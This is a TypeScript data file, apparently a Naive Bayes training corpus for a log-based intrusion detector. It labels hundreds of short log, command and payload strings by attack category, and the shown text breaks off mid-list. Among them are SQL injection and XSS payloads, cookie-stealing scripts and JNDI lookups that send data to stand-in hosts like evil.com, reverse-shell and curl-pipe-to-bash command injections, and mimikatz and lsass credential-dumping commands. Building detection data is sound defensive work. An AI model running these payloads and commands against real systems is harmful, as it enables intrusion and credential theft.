// =====================================================================
// 나이브 베이즈 학습 코퍼스 — 라벨링된 로그/명령/페이로드 예시
// 실제 침해 로그가 아니라, 공격 범주별 어휘 분포를 학습시키기 위한 대표
// 문장 집합. 분류기는 이 분포로부터 P(w|class) 를 추정한다.
//
// 규모: 560개 문서 · 18개 라벨(공격 17 + 정상 1).
// 라벨은 규칙기반 시그니처(mitreAttack.ts)의 카테고리와 정합되도록 구성.
// 품질검증(개발 시): tokenize 동일 포팅 기준 층화 5-겹 교차검증 정확도 ≈ 0.94.
// 출처 근거: PayloadsAllTheThings·SecLists·Sigma·LOLBAS·MITRE ATT&CK,
//   2025-2026 위협 인텔(C2: Sliver·Havoc·Mythic·Brute Ratel / RAT: AsyncRAT·Quasar·
//   Remcos·XWorm·DcRAT / 랜섬웨어: LockBit·BlackCat·Akira·Play·Cl0p 등).
// =====================================================================

import type { LabeledDoc } from './naiveBayes';

export const NB_LABEL_KO: Record<string, string> = {
  recon: "정찰/스캐닝",
  sqli: "SQL 인젝션",
  xss: "XSS(크로스사이트 스크립팅)",
  traversal: "경로순회/LFI",
  log4shell: "Log4Shell(JNDI)",
  webshell: "웹쉘/원격실행",
  rce: "명령어 인젝션/RCE",
  bruteforce: "무차별 대입",
  creddump: "자격증명 덤프",
  privesc: "권한 상승",
  discovery: "내부 정찰/탐색",
  lateral: "측면 이동",
  evasion: "방어 회피/흔적 제거",
  persistence: "지속성 확보",
  c2: "C2/원격제어",
  exfil: "데이터 유출",
  ransomware: "랜섬웨어/파괴",
  benign: "정상",
};

export const TRAINING_CORPUS: LabeledDoc[] = [
  // --- recon / 외부 정찰·스캐닝 ---
  { text: "GET /robots.txt HTTP/1.1 Nmap Scripting Engine", label: "recon" },
  { text: "GET /admin sqlmap scan directory enumeration", label: "recon" },
  { text: "GET /phpmyadmin 404 nikto web scanner", label: "recon" },
  { text: "GET /.git/config 404 masscan probe", label: "recon" },
  { text: "GET /.env HTTP masscan host enumeration", label: "recon" },
  { text: "GET /wp-admin whatweb fingerprint cms", label: "recon" },
  { text: "HEAD / server banner grab dirbuster", label: "recon" },
  { text: "GET /backup.zip 404 gobuster wordlist fuzzing", label: "recon" },
  { text: "GET /api/v1/users 404 feroxbuster content discovery", label: "recon" },
  { text: "User-Agent: Nuclei - Open-source project vulnerability scan", label: "recon" },
  { text: "GET /wp-login.php wpscan enumerate plugins", label: "recon" },
  { text: "GET /cgi-bin/ 404 ffuf fuzzing endpoints", label: "recon" },
  { text: "GET /server-status acunetix web vulnerability scanner", label: "recon" },
  { text: "GET /.well-known/security.txt whatweb recon probe", label: "recon" },
  { text: "Nessus scan detected port sweep tcp connect", label: "recon" },
  { text: "GET /login zgrab banner grabber automated", label: "recon" },
  { text: "GET /sitemap.xml crawler spidering site structure", label: "recon" },
  { text: "GET /wp-json/wp/v2/users rest api user enumeration", label: "recon" },
  { text: "GET /phpinfo.php 404 information disclosure probe", label: "recon" },
  { text: "multiple 404 responses /admin /manager /console directory bruteforce", label: "recon" },
  { text: "GET /.svn/entries source code repository exposure scan", label: "recon" },
  { text: "shodan censys reconnaissance internet wide scanning", label: "recon" },
  { text: "GET /actuator/env spring boot endpoint discovery", label: "recon" },
  { text: "GET /swagger-ui.html api documentation enumeration", label: "recon" },
  { text: "httpx probe alive hosts subdomain fingerprint", label: "recon" },
  { text: "GET /wp-content/ dirsearch wordlist brute directories", label: "recon" },
  { text: "masscan -p1-65535 rate 10000 full port scan", label: "recon" },
  { text: "GET /favicon.ico hash fingerprint framework detection", label: "recon" },
  { text: "nmap -sV -sC service version detection script scan", label: "recon" },
  { text: "whatweb -a 3 aggressive fingerprint technology stack", label: "recon" },
  { text: "GET /admin/login.php nikto -h target evasion tuning", label: "recon" },
  { text: "amass enum passive subdomain reconnaissance discovery", label: "recon" },

  // --- sqli / SQL 인젝션 ---
  { text: "GET /product?id=1' OR '1'='1 sqlmap", label: "sqli" },
  { text: "GET /product?id=1 UNION SELECT username,password FROM users--", label: "sqli" },
  { text: "GET /item?id=1; DROP TABLE users-- injection", label: "sqli" },
  { text: "login?user=admin'-- sql comment bypass", label: "sqli" },
  { text: "search?q=1 AND SLEEP(5) time based blind sqli", label: "sqli" },
  { text: "id=1 UNION ALL SELECT NULL,version()-- database", label: "sqli" },
  { text: "id=1' AND 1=1-- boolean based blind injection", label: "sqli" },
  { text: "id=1 UNION SELECT table_name FROM information_schema.tables--", label: "sqli" },
  { text: "id=1 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version())) error based", label: "sqli" },
  { text: "username=' OR 1=1 LIMIT 1-- authentication bypass", label: "sqli" },
  { text: "id=1 UNION SELECT load_file(0x2f6574632f706173737764) mysql read file", label: "sqli" },
  { text: "id=1;WAITFOR DELAY '0:0:5'-- mssql time based", label: "sqli" },
  { text: "id=1 AND extractvalue(1,concat(0x7e,database()))-- xpath error", label: "sqli" },
  { text: "id=1 AND updatexml(1,concat(0x7e,user()),1)-- mysql", label: "sqli" },
  { text: "id=1 ORDER BY 10-- column count enumeration", label: "sqli" },
  { text: "id=1 UNION SELECT NULL,concat(username,0x3a,password) FROM admin--", label: "sqli" },
  { text: "GET /news.php?id=-1' UNION SELECT 1,2,group_concat(schema_name)--", label: "sqli" },
  { text: "sqlmap identified injectable parameter id back-end dbms mysql", label: "sqli" },
  { text: "id=1 AND SLEEP(5) AND '1'='1 heavy query dos sqli", label: "sqli" },
  { text: "email=x'||(SELECT password FROM users)||'  oracle concat injection", label: "sqli" },
  { text: "id=1 procedure analyse(extractvalue(1,concat(0x3a,version())),1)", label: "sqli" },
  { text: "POST /login username=admin&password=1 OR 1=1# mysql comment", label: "sqli" },
  { text: "id=1'; EXEC xp_cmdshell('whoami')-- mssql stacked query rce", label: "sqli" },
  { text: "id=1 AND 1=CAST(version() AS int)-- postgres error based", label: "sqli" },
  { text: "GET /cat?id=1 divide by benchmark(5000000,md5(1)) mysql delay", label: "sqli" },
  { text: "id=1 UNION SELECT NULL,@@version,current_user()-- fingerprint dbms", label: "sqli" },
  { text: "q=test') UNION SELECT 1,pg_sleep(5)-- postgres blind", label: "sqli" },
  { text: "id=0x31 UNION SELECT hex encoded bypass waf filter", label: "sqli" },
  { text: "GET /report?year=2024 UNION SELECT credit_card FROM payments--", label: "sqli" },
  { text: "id=1/**/UNION/**/SELECT/**/1,2,3 inline comment waf evasion", label: "sqli" },
  { text: "wp_users UNION SELECT user_login,user_pass FROM wp_users wordpress sqli", label: "sqli" },

  // --- xss / 크로스사이트 스크립팅 ---
  { text: "GET /search?q=<script>alert(1)</script> reflected xss", label: "xss" },
  { text: "comment=<script>document.cookie</script> stored xss cookie theft", label: "xss" },
  { text: "name=<img src=x onerror=alert(document.domain)> xss payload", label: "xss" },
  { text: "q=<svg/onload=alert(1)> svg based cross site scripting", label: "xss" },
  { text: "input=javascript:alert(String.fromCharCode(88,83,83)) uri scheme xss", label: "xss" },
  { text: "GET /p?ref=%3Cscript%3Ealert(1)%3C%2Fscript%3E url encoded xss", label: "xss" },
  { text: "search=<body onload=alert(1)> event handler injection", label: "xss" },
  { text: "msg=\"><script src=//evil.js></script> attribute breakout xss", label: "xss" },
  { text: "q=<iframe src=javascript:alert(1)> iframe injection", label: "xss" },
  { text: "name=<a href=javascript:fetch(atob(...))>click</a> dom xss", label: "xss" },
  { text: "GET /profile?bio=<script>new Image().src=\"//c2/?c=\"+document.cookie</script>", label: "xss" },
  { text: "input=<img src=1 onerror=this.src=\"//attacker/\"+document.cookie>", label: "xss" },
  { text: "q=<details open ontoggle=alert(1)> html5 event xss", label: "xss" },
  { text: "search=<marquee onstart=alert(1)> obscure event handler", label: "xss" },
  { text: "payload=<script>eval(location.hash.slice(1))</script> dom based xss", label: "xss" },
  { text: "comment=<video><source onerror=\"javascript:alert(1)\"> media xss", label: "xss" },
  { text: "q=\"onmouseover=\"alert(1) attribute injection reflected", label: "xss" },
  { text: "GET /page?tpl={{constructor.constructor(\"alert(1)\")()}} template xss", label: "xss" },
  { text: "name=<script>fetch(\"/api/key\").then(r=>r.text()).then(k=>fetch(\"//evil/\"+k))</script>", label: "xss" },
  { text: "input=<input autofocus onfocus=alert(1)> autofocus xss vector", label: "xss" },
  { text: "q=%3Csvg%20onload%3Dalert(1)%3E encoded svg onload xss", label: "xss" },
  { text: "msg=<style>@keyframes x{}</style><xss style=animation-name:x onanimationstart=alert(1)>", label: "xss" },
  { text: "search=<script>document.location=\"//phish/?\"+document.cookie</script> session hijack", label: "xss" },
  { text: "GET /q?s=<ScRiPt>alert(1)</ScRiPt> case variation waf bypass xss", label: "xss" },
  { text: "comment=<textarea></textarea><script>alert(1)</script> tag break xss", label: "xss" },
  { text: "name=<img/src/onerror=alert(1)> slash separator xss", label: "xss" },
  { text: "input=<script>navigator.sendBeacon(\"//evil\",document.cookie)</script>", label: "xss" },
  { text: "q=<meta http-equiv=refresh content=0;url=javascript:alert(1)> meta xss", label: "xss" },
  { text: "polyglot javascript:/*--></title></style></script><svg onload=alert()>", label: "xss" },
  { text: "GET /view?html=<script>alert(document.domain)</script> reflected parameter", label: "xss" },
  { text: "stored xss in comment field <script> persistent payload executes on load", label: "xss" },

  // --- traversal / 경로순회·LFI·RFI ---
  { text: "GET /download?file=../../../../etc/passwd path traversal", label: "traversal" },
  { text: "GET /page?p=../../../../etc/shadow local file inclusion", label: "traversal" },
  { text: "GET /img?f=..%2f..%2f..%2fetc%2fpasswd url encoded traversal", label: "traversal" },
  { text: "GET /view?tpl=../../windows/win.ini directory traversal windows", label: "traversal" },
  { text: "GET /read?doc=....//....//etc/passwd filter bypass traversal", label: "traversal" },
  { text: "GET /static?path=..\\..\\..\\boot.ini backslash traversal", label: "traversal" },
  { text: "GET /file?name=php://filter/convert.base64-encode/resource=index.php lfi wrapper", label: "traversal" },
  { text: "GET /inc?page=/etc/passwd%00.png null byte truncation lfi", label: "traversal" },
  { text: "GET /load?f=..%252f..%252fetc%252fpasswd double url encode traversal", label: "traversal" },
  { text: "GET /doc?p=../../../../../../proc/self/environ lfi environ", label: "traversal" },
  { text: "GET /template?name=../../../../var/log/apache2/access.log log poisoning lfi", label: "traversal" },
  { text: "GET /avatar?path=..%c0%af..%c0%afetc/passwd unicode bypass traversal", label: "traversal" },
  { text: "GET /res?file=/var/www/../../etc/passwd absolute path traversal", label: "traversal" },
  { text: "GET /app?include=expect://whoami php expect wrapper rce lfi", label: "traversal" },
  { text: "GET /page?f=data://text/plain;base64,PD9waHAg... data wrapper lfi", label: "traversal" },
  { text: "GET /get?file=../../../../etc/hosts arbitrary file read", label: "traversal" },
  { text: "GET /download?path=..%2f..%2f..%2f.ssh/id_rsa ssh key theft traversal", label: "traversal" },
  { text: "GET /view?f=/etc/passwd sensitive file disclosure", label: "traversal" },
  { text: "GET /report?tpl=../../../../wp-config.php config file read lfi", label: "traversal" },
  { text: "GET /f?name=../../../../../windows/system32/drivers/etc/hosts", label: "traversal" },
  { text: "GET /page?p=..\\..\\..\\..\\windows\\win.ini iis traversal", label: "traversal" },
  { text: "GET /file?doc=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd encoded dots", label: "traversal" },
  { text: "GET /img?src=../../../../etc/passwd%00 poison null byte", label: "traversal" },
  { text: "GET /view?path=/proc/self/cmdline process information disclosure", label: "traversal" },
  { text: "GET /dl?f=..;/..;/..;/etc/passwd semicolon path bypass traversal", label: "traversal" },
  { text: "GET /assets?file=../../../../../etc/passwd deep traversal read", label: "traversal" },
  { text: "GET /include?f=http://evil/shell.txt remote file inclusion rfi", label: "traversal" },
  { text: "GET /page?lang=../../../../etc/passwd language parameter lfi", label: "traversal" },
  { text: "GET /backup?path=../../database.sql arbitrary download traversal", label: "traversal" },
  { text: "zip slip archive extraction ../../../etc/cron.d/evil traversal write", label: "traversal" },
  { text: "GET /docs?file=....\\\\....\\\\windows\\win.ini nested traversal windows", label: "traversal" },

  // --- log4shell / JNDI 인젝션 ---
  { text: "User-Agent ${jndi:ldap://attacker/Exploit} log4shell", label: "log4shell" },
  { text: "GET /api/data ${jndi:rmi://evil:1389/x} jndi lookup", label: "log4shell" },
  { text: "X-Api-Version ${jndi:dns://callback} log4j exploit", label: "log4shell" },
  { text: "header ${jndi:ldap://185.220.101.4:1389/Exploit} CVE-2021-44228", label: "log4shell" },
  { text: "Referer: ${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.evil.com} data exfil log4j", label: "log4shell" },
  { text: "X-Forwarded-For ${jndi:ldaps://malicious/a} secure ldap jndi", label: "log4shell" },
  { text: "User-Agent ${${lower:j}ndi:${lower:l}dap://x/y} obfuscated log4shell bypass", label: "log4shell" },
  { text: "authorization ${jndi:iiop://attacker/Object} corba jndi injection", label: "log4shell" },
  { text: "X-Api-Version ${jndi:${lower:l}${lower:d}ap://evil} nested lookup evasion", label: "log4shell" },
  { text: "cookie ${jndi:dns://${sys:java.version}.evil} fingerprint via jndi dns", label: "log4shell" },
  { text: "POST /login username=${jndi:rmi://c2:1099/exp} log4j2 rce", label: "log4shell" },
  { text: "GET / ${jndi:ldap://127.0.0.1#evil.com/a} authority bypass log4shell", label: "log4shell" },
  { text: "X-Client ${${::-j}${::-n}${::-d}${::-i}:ldap://x} char obfuscation jndi", label: "log4shell" },
  { text: "referer ${jndi:nis://attacker/x} nis service jndi lookup", label: "log4shell" },
  { text: "header value ${jndi:ldap://world.example/${hostName}} host exfiltration", label: "log4shell" },
  { text: "CVE-2021-44228 apache log4j2 remote code execution jndi ldap", label: "log4shell" },
  { text: "CVE-2021-45046 log4j incomplete patch context map lookup", label: "log4shell" },
  { text: "X-Api ${jndi:ldap://0x2f.0x0.0x0.0x1:1389/a} hex ip jndi bypass", label: "log4shell" },
  { text: "User-Agent ${jndi:ldap://[::1]/a} ipv6 jndi lookup evasion", label: "log4shell" },
  { text: "GET /search?q=${jndi:ldap://scan.log4shell.tools} mass scanning payload", label: "log4shell" },
  { text: "X-Druid ${jndi:ldap://evil/o} log4shell targeting apache druid", label: "log4shell" },
  { text: "vmware vcenter ${jndi:ldap://x/exp} log4j exploitation attempt", label: "log4shell" },
  { text: "X-Real-IP ${jndi:ldap://${lower:d}ns.evil} case folding lookup", label: "log4shell" },
  { text: "header ${jndi:rmi://attacker:1097/Payload} remote method invocation", label: "log4shell" },
  { text: "GET / ${jndi:http://evil/payload} http lookup log4j variant", label: "log4shell" },
  { text: "solr admin ${jndi:ldap://evil} log4shell apache solr rce", label: "log4shell" },
  { text: "${jndi:ldap://%77%77%77.evil.com/a} url encoded host jndi", label: "log4shell" },
  { text: "X-Requested-With ${jndi:ldap://burpcollaborator.net} oob detection log4j", label: "log4shell" },
  { text: "log4j vulnerable version 2.14.1 jndi lookup enabled exploited", label: "log4shell" },
  { text: "elasticsearch ${jndi:ldap://c2/exp} log4shell downstream product", label: "log4shell" },
  { text: "unifi network ${jndi:ldap://attacker/Basic/Command/Base64/...} rce", label: "log4shell" },

  // --- webshell / 웹쉘 업로드·실행 ---
  { text: "POST /upload.php shell uploaded 200 webshell", label: "webshell" },
  { text: "GET /uploads/cmd.jsp?cmd=whoami remote command webshell", label: "webshell" },
  { text: "GET /uploads/cmd.jsp?cmd=cat /etc/passwd webshell", label: "webshell" },
  { text: "GET /shell.aspx?cmd=ipconfig china chopper webshell", label: "webshell" },
  { text: "POST /a.php eval base64_decode webshell backdoor", label: "webshell" },
  { text: "GET /assets/x.php?c=id command execution webshell", label: "webshell" },
  { text: "POST /images/logo.php?pass=admin antsword webshell connection", label: "webshell" },
  { text: "GET /tmp/r57.php remote file manager php webshell", label: "webshell" },
  { text: "GET /wp-content/uploads/wso.php web shell orb backdoor", label: "webshell" },
  { text: "POST /shell.php c=system(\"id\") php system webshell", label: "webshell" },
  { text: "GET /uploads/c99.php php filesystem web shell defacement", label: "webshell" },
  { text: "POST /godzilla.jsp encrypted webshell aes traffic evasion", label: "webshell" },
  { text: "POST /behinder.aspx memory shell encrypted webshell", label: "webshell" },
  { text: "GET /cmd.php?cmd=powershell -enc aQBlAHgA reverse shell webshell", label: "webshell" },
  { text: "POST /assets/upload.jsp jsp webshell arbitrary file upload rce", label: "webshell" },
  { text: "GET /x.php?0=system&1=whoami dynamic function webshell", label: "webshell" },
  { text: "POST /admin/fckeditor upload shell.php.jpg bypass upload webshell", label: "webshell" },
  { text: "GET /uploads/1.phtml?cmd=uname phtml extension webshell bypass", label: "webshell" },
  { text: "GET /shell.jspx?cmd=net user jspx webshell tomcat", label: "webshell" },
  { text: "POST /api/upload filename=shell.php content-type image/png webshell", label: "webshell" },
  { text: "GET /backdoor.php?action=download&file=/etc/shadow webshell file read", label: "webshell" },
  { text: "POST /theme/editor.php inject <?php passthru($_GET[c]) webshell", label: "webshell" },
  { text: "GET /media/evil.php?cmd=wget http://c2/mal -O /tmp/x webshell download", label: "webshell" },
  { text: "GET /assets/shell.php eval($_REQUEST[\"cmd\"]) request webshell", label: "webshell" },
  { text: "POST /upload webshell.war deploy tomcat manager rce", label: "webshell" },
  { text: "GET /cgi/shell.pl?cmd=id perl cgi webshell command execution", label: "webshell" },
  { text: "POST /jmx-console jboss deploy war webshell remote code execution", label: "webshell" },
  { text: "GET /uploads/img.php.png?cmd=whoami double extension webshell", label: "webshell" },
  { text: "webshell detected obfuscated eval gzinflate str_rot13 base64_decode", label: "webshell" },
  { text: "GET /shell.asp?cmd=cmd.exe /c dir classic asp webshell iis", label: "webshell" },
  { text: "POST /filemanager.php move backdoor to webroot php webshell persistence", label: "webshell" },

  // --- rce / 명령어 인젝션·원격코드실행 ---
  { text: "GET /ping?host=127.0.0.1;whoami os command injection", label: "rce" },
  { text: "GET /dns?d=example.com|id command injection pipe", label: "rce" },
  { text: "POST /exec cmd=$(cat /etc/passwd) command substitution rce", label: "rce" },
  { text: "GET /api?f=`whoami` backtick command injection", label: "rce" },
  { text: "host=127.0.0.1 && curl http://evil/x|bash command injection rce", label: "rce" },
  { text: "GET /tool?ip=8.8.8.8;wget http://c2/mal -O /tmp/m command injection", label: "rce" },
  { text: "filename=;nc -e /bin/sh attacker 4444 reverse shell command injection", label: "rce" },
  { text: "GET /convert?f=x.jpg;rm -rf / os command injection destructive", label: "rce" },
  { text: "POST /feedback name=$(curl http://evil) blind command injection oob", label: "rce" },
  { text: "GET /run?cmd=powershell downloadstring command execution injection", label: "rce" },
  { text: "java deserialization ysoserial CommonsCollections rce gadget chain", label: "rce" },
  { text: "GET /?page=php://input system command injection code execution rce", label: "rce" },
  { text: "struts2 ognl injection remote code execution CVE-2017-5638", label: "rce" },
  { text: "spring4shell classloader remote code execution CVE-2022-22965", label: "rce" },
  { text: "GET /cgi-bin/test.cgi shellshock () { :;}; /bin/bash command injection", label: "rce" },
  { text: "POST /api eval(request.body) server side code injection rce nodejs", label: "rce" },
  { text: "template injection server side ssti jinja2 remote code execution", label: "rce" },
  { text: "GET /?name=config __class__ ssti python rce flask template", label: "rce" },
  { text: "imagemagick convert |curl evil command injection ghostscript rce", label: "rce" },
  { text: "GET /redirect?url=;system id os command injection semicolon", label: "rce" },
  { text: "POST /upload xml external entity xxe billion laughs rce", label: "rce" },
  { text: "log4j ognl python pickle deserialization rce loads gadget", label: "rce" },
  { text: "GET /net?cmd=cat%20/etc/passwd%3Bid encoded command injection", label: "rce" },
  { text: "perl open pipe command injection cgi remote code execution", label: "rce" },
  { text: "ruby kernel system user input command injection rce unsanitized", label: "rce" },
  { text: "GET /ping?ip=1.1.1.1%0awhoami newline crlf command injection", label: "rce" },
  { text: "wget http://evil/x.sh -O- | sh pipe to shell rce download cradle", label: "rce" },
  { text: "os.system user input python command injection unsanitized rce", label: "rce" },
  { text: "GET /exec?c=id;uname -a chained os command injection", label: "rce" },
  { text: "POST /device diag=;telnet evil 23 iot command injection router", label: "rce" },
  { text: "GET /calc?expr=__import__ os system rce python eval injection", label: "rce" },

  // --- bruteforce / 무차별 대입·인증실패 ---
  { text: "POST /api/login 401 failed python-requests repeated", label: "bruteforce" },
  { text: "login_attempt failed admin password guessing", label: "bruteforce" },
  { text: "sshd Failed password for root repeated attempts", label: "bruteforce" },
  { text: "authentication failure admin administrator root dictionary", label: "bruteforce" },
  { text: "POST /login 401 401 401 credential stuffing hydra", label: "bruteforce" },
  { text: "sshd[1234]: Failed password for invalid user oracle from 203.0.113.5", label: "bruteforce" },
  { text: "Windows Security event id 4625 failed logon account admin", label: "bruteforce" },
  { text: "hydra -l admin -P rockyou.txt ssh brute force attack", label: "bruteforce" },
  { text: "POST /wp-login.php 200 wordpress xmlrpc password brute force", label: "bruteforce" },
  { text: "medusa -h target -u root -P passwords.txt ftp bruteforce", label: "bruteforce" },
  { text: "multiple 401 unauthorized responses same source ip login endpoint", label: "bruteforce" },
  { text: "kerberoasting password spray against domain accounts", label: "bruteforce" },
  { text: "sshd Failed password for user postgres from 45.155.205.0 port 22", label: "bruteforce" },
  { text: "POST /admin 403 forbidden repeated login failed credential guessing", label: "bruteforce" },
  { text: "ncrack rdp brute force administrator weak password", label: "bruteforce" },
  { text: "event id 4625 status 0xc000006a bad password logon type 3", label: "bruteforce" },
  { text: "patator http_fuzz login form password list brute", label: "bruteforce" },
  { text: "failed login attempt 50 times account lockout threshold reached", label: "bruteforce" },
  { text: "smtp auth failed brute force mail relay 535 authentication", label: "bruteforce" },
  { text: "POST /oauth/token invalid_grant repeated client secret guessing", label: "bruteforce" },
  { text: "sshd Disconnecting: Too many authentication failures", label: "bruteforce" },
  { text: "password spraying single password across many usernames o365", label: "bruteforce" },
  { text: "ftp 530 login incorrect repeated anonymous brute attempts", label: "bruteforce" },
  { text: "POST /login failed 200 wrong password crowbar rdp bruteforce", label: "bruteforce" },
  { text: "mysql access denied for user root repeated password attempts", label: "bruteforce" },
  { text: "vnc authentication failed repeated connection brute force", label: "bruteforce" },
  { text: "event 4771 kerberos pre-authentication failed brute force", label: "bruteforce" },
  { text: "POST /api/v2/auth 429 too many requests login rate limit brute", label: "bruteforce" },
  { text: "invalid credentials repeated 401 basic auth header brute", label: "bruteforce" },
  { text: "thc-hydra smb brute force administrator local account", label: "bruteforce" },
  { text: "winrm 5985 repeated authentication failure password brute force", label: "bruteforce" },

  // --- creddump / 자격증명 덤프 ---
  { text: "mimikatz sekurlsa::logonpasswords credential dump", label: "creddump" },
  { text: "lsass memory dump procdump comsvcs minidump", label: "creddump" },
  { text: "reg save HKLM\\SAM SYSTEM hive extraction", label: "creddump" },
  { text: "ntds.dit dcsync secretsdump domain hashes", label: "creddump" },
  { text: "mimikatz.exe privilege::debug sekurlsa::logonpasswords full", label: "creddump" },
  { text: "procdump64.exe -ma lsass.exe lsass.dmp credential theft", label: "creddump" },
  { text: "rundll32 comsvcs.dll MiniDump lsass memory dump", label: "creddump" },
  { text: "impacket-secretsdump domain/user@dc -just-dc ntds hashes", label: "creddump" },
  { text: "lazagne.exe all harvest stored browser passwords credentials", label: "creddump" },
  { text: "nanodump lsass handle duplication evasion dump", label: "creddump" },
  { text: "reg save hklm\\system system.hiv reg save hklm\\sam sam.hiv", label: "creddump" },
  { text: "mimikatz lsadump::dcsync /user:krbtgt golden ticket prep", label: "creddump" },
  { text: "sekurlsa::pth pass the hash mimikatz overpass", label: "creddump" },
  { text: "esentutl.exe /y ntds.dit copy volume shadow credential", label: "creddump" },
  { text: "vaultcmd /listcreds windows credential vault dumping", label: "creddump" },
  { text: "wce.exe -w windows credential editor plaintext dump", label: "creddump" },
  { text: "gsecdump extract lsa secrets cached domain credentials", label: "creddump" },
  { text: "mimikatz kerberos::list /export kerberoast ticket extraction", label: "creddump" },
  { text: "crackmapexec smb --sam --lsa dump remote credentials", label: "creddump" },
  { text: "dumpert direct syscall lsass unhooking evasion dump", label: "creddump" },
  { text: "reg query HKLM\\SECURITY lsa secrets service account password", label: "creddump" },
  { text: "sqldumper.exe lsass process memory dump lolbin creddump", label: "creddump" },
  { text: "handlekatz lsass clone dump defender evasion credential", label: "creddump" },
  { text: "mimikatz sekurlsa::ekeys aes kerberos keys extraction", label: "creddump" },
  { text: "powershell Invoke-Mimikatz -DumpCreds in memory execution", label: "creddump" },
  { text: "ntdsutil ifm create full snapshot ntds.dit exfil credentials", label: "creddump" },
  { text: "dcsync replication DsGetNCChanges domain controller hashes", label: "creddump" },
  { text: "certipy ad cs abuse extract certificate credentials shadow", label: "creddump" },
  { text: "keychain dump macos security find-generic-password credential", label: "creddump" },
  { text: "browser stored credential theft login data sqlite chrome dump", label: "creddump" },
  { text: "meterpreter hashdump SAM registry local account hashes", label: "creddump" },

  // --- privesc / 권한 상승 ---
  { text: "getsystem named pipe impersonation privilege escalation", label: "privesc" },
  { text: "JuicyPotato SeImpersonatePrivilege token abuse local admin", label: "privesc" },
  { text: "PrintSpoofer.exe -i -c cmd SeImpersonate privilege escalation", label: "privesc" },
  { text: "GodPotato dcom token privilege escalation to system", label: "privesc" },
  { text: "sudo su root privilege escalation misconfigured sudoers", label: "privesc" },
  { text: "runas /user:administrator cmd elevated privilege", label: "privesc" },
  { text: "linpeas.sh suid binary privilege escalation enumeration", label: "privesc" },
  { text: "winpeas unquoted service path privilege escalation vector", label: "privesc" },
  { text: "CVE-2021-4034 pkexec pwnkit local privilege escalation linux", label: "privesc" },
  { text: "dirtypipe CVE-2022-0847 linux kernel privilege escalation", label: "privesc" },
  { text: "SeDebugPrivilege token manipulation escalate to system", label: "privesc" },
  { text: "bypassuac fodhelper.exe registry hijack uac bypass elevation", label: "privesc" },
  { text: "exploit CVE-2021-1675 printnightmare spooler privilege escalation", label: "privesc" },
  { text: "writable service binary replace escalate SYSTEM privilege", label: "privesc" },
  { text: "setuid root binary abuse gtfobins privilege escalation", label: "privesc" },
  { text: "token::elevate mimikatz impersonate system token escalation", label: "privesc" },
  { text: "dll hijacking writable path privilege escalation service", label: "privesc" },
  { text: "schtasks run as SYSTEM privilege escalation scheduled task", label: "privesc" },
  { text: "sudo -l NOPASSWD gtfobins vim shell escape root privesc", label: "privesc" },
  { text: "always install elevated msi policy privilege escalation windows", label: "privesc" },
  { text: "kernel exploit CVE-2023-21768 afd.sys local privilege escalation", label: "privesc" },
  { text: "weak folder permission dll planting privilege escalation", label: "privesc" },
  { text: "RoguePotato SeImpersonate rpc relay privilege escalation system", label: "privesc" },
  { text: "cron job writable script root privilege escalation linux", label: "privesc" },
  { text: "capabilities cap_setuid abuse binary privilege escalation", label: "privesc" },
  { text: "unquoted service path C:\\Program Files escalate binary hijack", label: "privesc" },
  { text: "CVE-2020-1472 zerologon domain admin privilege escalation", label: "privesc" },
  { text: "HiveNightmare CVE-2021-36934 SAM readable privilege escalation", label: "privesc" },
  { text: "polkit dbus privilege escalation local root exploit", label: "privesc" },
  { text: "access token theft duplicate impersonate elevate privilege", label: "privesc" },
  { text: "exploitation for privilege escalation local admin to system", label: "privesc" },

  // --- discovery / 내부 정찰·호스트/도메인 탐색 ---
  { text: "whoami /all enumerate user privileges groups token", label: "discovery" },
  { text: "net user /domain enumerate domain accounts discovery", label: "discovery" },
  { text: "net group \"Domain Admins\" /domain privileged group enumeration", label: "discovery" },
  { text: "nltest /dclist:corp domain controller discovery", label: "discovery" },
  { text: "systeminfo host configuration patch level discovery", label: "discovery" },
  { text: "ipconfig /all network interface configuration discovery", label: "discovery" },
  { text: "arp -a local network host discovery neighbor cache", label: "discovery" },
  { text: "netstat -ano active connections listening ports discovery", label: "discovery" },
  { text: "tasklist /v running processes enumeration discovery", label: "discovery" },
  { text: "quser query logged on users session discovery", label: "discovery" },
  { text: "net view /all enumerate network shares smb discovery", label: "discovery" },
  { text: "sharphound collectionmethod all bloodhound ad recon", label: "discovery" },
  { text: "adfind -f objectcategory=computer domain computer enumeration", label: "discovery" },
  { text: "dsquery user domain account enumeration ldap discovery", label: "discovery" },
  { text: "ldapsearch -x -b dc=corp,dc=local enumerate directory objects", label: "discovery" },
  { text: "net localgroup administrators local admin enumeration", label: "discovery" },
  { text: "wmic qfe get hotfix patch enumeration discovery", label: "discovery" },
  { text: "nltest /domain_trusts enumerate trust relationships discovery", label: "discovery" },
  { text: "Get-ADUser -Filter * powershell active directory enumeration", label: "discovery" },
  { text: "route print network routing table discovery reconnaissance", label: "discovery" },
  { text: "net accounts password policy domain discovery", label: "discovery" },
  { text: "reg query HKLM software installed programs enumeration", label: "discovery" },
  { text: "net share enumerate local shared folders discovery", label: "discovery" },
  { text: "seatbelt host survey situational awareness enumeration", label: "discovery" },
  { text: "nslookup -type=srv _ldap._tcp.dc discovery domain services", label: "discovery" },
  { text: "Get-NetComputer powerview domain host enumeration recon", label: "discovery" },
  { text: "wmic process list full process discovery host survey", label: "discovery" },
  { text: "hostname domain membership check discovery command", label: "discovery" },
  { text: "cat /etc/passwd enumerate linux users local discovery", label: "discovery" },
  { text: "crackmapexec smb 10.0.0.0/24 network host share enumeration", label: "discovery" },
  { text: "find / -perm -4000 suid discovery local enumeration linux", label: "discovery" },

  // --- lateral / 측면 이동 ---
  { text: "psexec \\\\10.0.0.20 -u administrator cmd.exe remote", label: "lateral" },
  { text: "wmic /node process call create lateral movement", label: "lateral" },
  { text: "Accepted password sshd from internal host pivot", label: "lateral" },
  { text: "smbexec winrm remote powershell to 10.0.0.30", label: "lateral" },
  { text: "PsExec.exe \\\\dc01 -s cmd remote system lateral movement", label: "lateral" },
  { text: "impacket-wmiexec domain/admin@10.0.0.15 remote command", label: "lateral" },
  { text: "evil-winrm -i 10.0.0.40 -u admin lateral movement powershell", label: "lateral" },
  { text: "Enter-PSSession -ComputerName srv02 winrm remote session", label: "lateral" },
  { text: "wmic /node:10.0.0.50 process call create \"cmd /c calc\"", label: "lateral" },
  { text: "crackmapexec smb 10.0.0.0/24 -x whoami pass the hash spread", label: "lateral" },
